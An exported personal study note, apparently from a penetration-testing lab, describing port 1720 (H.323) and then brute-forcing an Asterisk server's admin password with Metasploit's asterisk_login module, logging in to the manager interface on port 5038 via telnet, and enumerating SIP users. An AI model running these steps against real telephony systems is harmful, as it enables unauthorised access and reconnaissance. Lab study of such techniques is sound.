<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>communication</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>communication</h1>

      <div class="ck-content">
        <h2>Port 1720:</h2>

        <figure class="table">
          <table>
            <tbody>
              <tr>
                <td style="text-align:right"><span style="color:#666666">Name: </span>

                </td>
                <td><span style="color:#000066"><strong>h323hostcall</strong></span>

                </td>
              </tr>
              <tr>
                <td style="text-align:right"><span style="color:#666666">Purpose: </span>

                </td>
                <td>
                  <img src="communication/transpixel.gif" /><span style="color:#000066"><strong>H.323 (Microsoft NetMeeting) call setup protocol</strong></span>

                </td>
              </tr>
              <tr>
                <td style="text-align:right"><span style="color:#666666">Description: </span>

                </td>
                <td>
                  <img src="communication/transpixel.gif" /><span style="color:#000066">Port 1720 is used by the H.323 teleconferencing protocol (most commonly encountered in Microsoft NetMeeting) during call setup negotiation.</span>

                </td>
              </tr>
              <tr>
                <td style="text-align:right"><span style="color:#666666">Related Ports: </span>

                </td>
                <td>
                  <img src="communication/transpixel.gif" /><a href="https://www.grc.com/port_389.htm"><span style="color:#000066">389</span></a>

                  <span
                  style="color:#000066">,</span><a href="https://www.grc.com/port_1002.htm"><span style="color:#000066">1002</span></a>

                </td>
              </tr>
            </tbody>
          </table>
        </figure>
        <p>H. 323 is the more mature of the two, but problems may arise due to lack
          of flexibility. SIP is currently less defined, but has greater scalability
          which could ease internet application integration. </p>
        <p>Searching <code>asterisk</code> in msfconsole shows <code>auxiliary/voip/asterisk_login</code> module
          with which we're able to bruteforce the password of <code>admin</code>(abc123)</p>
        <p>using telnet on port 5038(asterisk call manager):</p><pre><code class="language-text-plain">Action: Login
ActionID: 1
Username: admin
Secret: abc123

Response: Success
ActionID: 1
Message: Authentication accepted</code></pre>

        <p>Will show authentication accepted, than we type:</p><pre><code class="language-text-plain">action:command
command:sip show users</code></pre>

        <p> </p>
      </div>
    </div>
  </body>

</html>